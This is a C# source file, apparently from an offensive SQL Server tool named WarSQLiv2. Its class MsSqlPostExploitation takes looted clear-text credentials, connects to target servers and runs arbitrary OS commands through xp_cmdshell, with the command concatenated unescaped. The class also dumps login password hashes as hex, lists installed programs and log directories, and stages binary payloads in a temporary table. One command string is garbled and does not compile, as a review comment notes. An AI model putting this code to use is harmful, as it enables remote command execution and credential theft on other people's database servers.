
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.Common;
using System.Data.SqlClient;
using System.Linq;
using WarSQLiv2.Exploitation.Control;

namespace WarSQLiv2.Exploitation.PostExploitation
{
class MsSqlPostExploitation
{
// Backing fields for the Exception, ExploitResult and ExploitCode properties below.
private string _exception;
private string _exploitResult;
private string _exploitCode;
// Filled by ShowLogDirectory() with column 2 of every row it reads.
public List<string> _msSqlLogDirectoryList = new List<string>();
// Cleared and refilled by ShowProgramList() with column 0 of every row it reads.
public List<string> _programList = new List<string>();
/// <summary>
/// T-SQL batch text that RunExploit, ShowLogDirectory, ShowProgramList and HashDump send to the server as-is.
/// </summary>
public string ExploitCode
{
get { return _exploitCode; }
set { _exploitCode = value; }
}
/// <summary>
/// Used to capture the exception that was thrown and show it to the user.
/// </summary>
public string Exception
{
get { return _exception; }
set
{
// The first assignment is a dead store; only the second one has an effect.
_exception = string.Empty;
_exception = value;
}
}
/// <summary>
/// Text accumulated from the rows read by the methods of this class; read-only for callers.
/// </summary>
public string ExploitResult
{
get { return _exploitResult; }
}

/// <summary>
/// The selected ListBox item must always be assigned to SelectedItem. This value must be the selected item of lstLooted.
/// </summary>
// The methods of this class split the value on ':' and use field 0 as the server,
// field 2 as the login and field 3 as the password, so it carries a clear-text credential.
public string SelectedItem { get; set; }

/// <summary>
/// Exploitation commands coming from the user run inside this method. The exploitation code has to be set dynamically by the form that makes the call, so it must be supplied through the ExploitCode string.
/// </summary>
// NOTE(review): the summary above describes a method and ExploitCode, yet it is attached to this
// property; SqlCommand itself is the text SqlExploitation() concatenates into its xp_cmdshell batch.
public string SqlCommand { get; set; }
// Bound to the @binaryTable parameter by InsertBinaryData().
public byte[] BinaryData { get; set; }
// Not referenced by any other member visible in this file.
public string mimiData { get; set; }
// Appended to by LootedControl(); never initialised inside this class.
public List<string> LootedList { get; set; }
// Rebuilt by SqlExploitation() from the pieces of its result text.
public List<string> VolumeList { get; set; }
// Column index RunExploit() reads from every row.
public int SQLReaderValue { get; set; }
/// <summary>
/// Wraps <see cref="SqlCommand"/> in an <c>xp_cmdshell</c> call, runs it on the server described by
/// <see cref="SelectedItem"/>, stores column 0 of every row in the result text and splits that text into <see cref="VolumeList"/>.
/// </summary>
/// <remarks>
/// When <see cref="SelectedItem"/> is null or empty nothing is executed and <see cref="Exception"/> receives the
/// <c>MessageExploitError1</c> resource string. A <see cref="SqlException"/> is not rethrown; its message is stored in
/// <see cref="Exception"/>. On the server side, xp_cmdshell is disabled by default, so a change to that setting and any
/// call to the procedure are events worth auditing.
/// </remarks>
public void SqlExploitation()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var exploitCode = "";
// NOTE(review): this literal looks damaged by page extraction (doubled quotes, a bare "rn" at the end) and does not
// compile as shown; Split('r') and Remove("n") further down show the same loss. SqlCommand is concatenated unescaped.
exploitCode += "EXEC xp_cmdshell '"" + SqlCommand + ""';rn";
if (!string.IsNullOrEmpty(SelectedItem))
{
// SelectedItem is ':'-separated; field 1 is skipped. An entry with fewer than four fields throws
// IndexOutOfRangeException here, which the catch below (SqlException only) does not handle.
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
// NOTE(review): connection, command and reader are closed only on the success path; nothing disposes them when a call throws.
var conn = new SqlConnection(conS);
var cmd = new SqlCommand(exploitCode, conn);
conn.Open();
var rdr = cmd.ExecuteReader();
_exploitResult = string.Empty;
while (rdr.Read())
{
_exploitResult += $"{Environment.NewLine}{rdr[0]}";
}
rdr.Close();
conn.Close();

// Split the collected text into entries and drop an empty entry, an "n" entry and a "Caption " entry;
// List.Remove deletes only the first match of each.
VolumeList = new List<string>();
var volumeListSpliter = _exploitResult.Trim().Split('r');
for (var i = 0; i < volumeListSpliter.Count(); i++)
{
VolumeList.Add(volumeListSpliter[i]);
}
VolumeList.Remove("");
VolumeList.Remove("n");
VolumeList.Remove("Caption ");

}
catch (SqlException exp)
{
// Message layout: GeneralError1 + GeneralError2 + newline + server error text.
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
else
{
Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
}
}
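/// <summary>
/// Sends the batch held in <see cref="ExploitCode"/> to the server described by <see cref="SelectedItem"/> and
/// collects one column of every returned row into the result text.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// The column read from each row is chosen by <see cref="SQLReaderValue"/>. A <see cref="SqlException"/> is not
/// rethrown; its message is stored in <see cref="Exception"/>.
/// </remarks>
public void RunExploit()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection, command and reader even when a call throws.
        using (var conn = new SqlConnection(conS))
        using (var cmd = new SqlCommand(ExploitCode, conn))
        {
            conn.Open();
            using (var rdr = cmd.ExecuteReader())
            {
                _exploitResult = string.Empty;
                while (rdr.Read())
                {
                    _exploitResult += $"{Environment.NewLine}{rdr[SQLReaderValue]}";
                }
            }
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}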
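/// <summary>
/// Sends the batch held in <see cref="ExploitCode"/> to the server described by <see cref="SelectedItem"/> and
/// appends column 2 of every returned row to <see cref="_msSqlLogDirectoryList"/>.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// The list is appended to, not cleared. A <see cref="SqlException"/> is not rethrown; its message is stored in
/// <see cref="Exception"/>.
/// </remarks>
public void ShowLogDirectory()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection, command and reader even when a call throws.
        using (var conn = new SqlConnection(conS))
        using (var cmd = new SqlCommand(ExploitCode, conn))
        {
            conn.Open();
            using (var rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                {
                    _msSqlLogDirectoryList.Add(rdr[2].ToString());
                }
            }
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}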
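/// <summary>
/// Sends the batch held in <see cref="ExploitCode"/> to the server described by <see cref="SelectedItem"/>,
/// refills <see cref="_programList"/> with column 0 of every returned row and appends the same values to the result text.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// The result text is appended to, not reset. A <see cref="SqlException"/> is not rethrown; its message is stored in
/// <see cref="Exception"/>.
/// </remarks>
public void ShowProgramList()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();
    _programList.Clear();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection, command and reader even when a call throws.
        using (var conn = new SqlConnection(conS))
        using (var cmd = new SqlCommand(ExploitCode, conn))
        {
            conn.Open();
            using (var rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                {
                    _programList.Add(rdr[0].ToString());
                    _exploitResult += $"{Environment.NewLine}{rdr[0]}";
                }
            }
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}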
/// <summary>
/// Runs <c>LootedFileControl.FileControl()</c> and appends every entry of the helper's <c>LootedList</c> to
/// <see cref="LootedList"/>.
/// </summary>
/// <remarks>
/// Any exception raised on the way is swallowed and <see cref="Exception"/> is overwritten with the helper's own
/// <c>Exception</c> value. NOTE(review): <see cref="LootedList"/> is not initialised inside this class, so the first
/// append fails into that catch path unless the caller assigned a list beforehand; confirm against callers.
/// </remarks>
private void LootedControl()
{
    var fileControl = new LootedFileControl();
    try
    {
        fileControl.FileControl();
        foreach (var entry in fileControl.LootedList)
        {
            LootedList.Add(entry);
        }
    }
    catch (Exception)
    {
        // The caught exception itself is discarded; only the helper's message is surfaced.
        Exception = fileControl.Exception;
    }
}
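/// <summary>
/// Sends the batch held in <see cref="ExploitCode"/> to the server described by <see cref="SelectedItem"/> and
/// appends one line per returned row to the result text, formatted as column 0, " : ", then column 1 as upper-case hex.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// Column 1 is cast to <c>byte[]</c>; a row whose column 1 has another type raises an exception this method does not
/// catch. A <see cref="SqlException"/> is not rethrown; its message is stored in <see cref="Exception"/>.
/// </remarks>
public void HashDump()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection, command and reader even when a call throws.
        using (var conn = new SqlConnection(conS))
        using (var cmd = new SqlCommand(ExploitCode, conn))
        {
            conn.Open();
            using (var rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                {
                    var raw = (byte[])rdr[1];
                    // BitConverter yields "AA-BB-CC"; the dashes are stripped to get one contiguous hex string.
                    var hexCode = BitConverter.ToString(raw).Replace("-", "");
                    var value = rdr[0].ToString() + " : " + hexCode;
                    _exploitResult += $"{Environment.NewLine}{value}";
                }
            }
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}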
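/// <summary>
/// Drops the <c>WarSQLiTemp</c> table in the <c>master</c> database if it exists and recreates it with a single
/// <c>image</c> column named <c>binaryTable</c>, on the server described by <see cref="SelectedItem"/>.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// A <see cref="SqlException"/> is not rethrown; its message is stored in <see cref="Exception"/>.
/// </remarks>
public void CreateBinaryTable()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection and command even when a call throws.
        using (var cnn = new SqlConnection(conS))
        using (var cmd = new SqlCommand())
        {
            cmd.Connection = cnn;
            cmd.CommandText = "IF OBJECT_ID('WarSQLiTemp')IS NOT NULL DROP TABLE WarSQLiTemp" + Environment.NewLine + "CREATE TABLE dbo.WarSQLiTemp(binaryTable image);";
            cnn.Open();
            cmd.ExecuteNonQuery();
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}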
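/// <summary>
/// Inserts <see cref="BinaryData"/> as one row into the <c>WarSQLiTemp</c> table on the server described by
/// <see cref="SelectedItem"/>, passing the bytes as a typed <c>image</c> parameter.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// A <see cref="SqlException"/> is not rethrown; its message is stored in <see cref="Exception"/>.
/// </remarks>
public void InsertBinaryData()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection and command even when a call throws.
        using (var cnn = new SqlConnection(conS))
        using (var cmd = new SqlCommand())
        {
            cmd.Connection = cnn;
            cmd.CommandText = "insert into WarSQLiTemp(binaryTable) values(@binaryTable)";
            var dbp = new SqlParameter("@binaryTable", SqlDbType.Image);
            dbp.Value = BinaryData;
            cmd.Parameters.Add(dbp);
            cnn.Open();
            cmd.ExecuteNonQuery();
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}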
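/// <summary>
/// Drops the <c>WarSQLiTemp</c> table on the server described by <see cref="SelectedItem"/>.
/// </summary>
/// <remarks>
/// <see cref="SelectedItem"/> is split on ':'; field 0 is the server, field 2 the login and field 3 the password.
/// The statement has no existence check, so a missing table surfaces as a <see cref="SqlException"/>, which is not
/// rethrown; its message is stored in <see cref="Exception"/>.
/// </remarks>
public void RemoveTempTable()
{
    LootedControl();
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    // SqlExploitation reports a missing SelectedItem with the MessageExploitError1 resource; reuse it here for an
    // entry that is missing or too short instead of failing with NullReferenceException / IndexOutOfRangeException.
    var fields = (SelectedItem ?? string.Empty).Split(':');
    if (fields.Length < 4)
    {
        Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    var server = fields[0];
    var user = fields[2];
    var pass = fields[3];
    var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
    try
    {
        // using blocks release the connection and command even when a call throws.
        using (var cnn = new SqlConnection(conS))
        using (var cmd = new SqlCommand())
        {
            cmd.Connection = cnn;
            cmd.CommandText = "DROP TABLE WarSQLiTemp";
            cnn.Open();
            cmd.ExecuteNonQuery();
        }
    }
    catch (SqlException exp)
    {
        // Message layout: GeneralError1 + GeneralError2 + newline + server error text.
        Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}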
}
}
     
 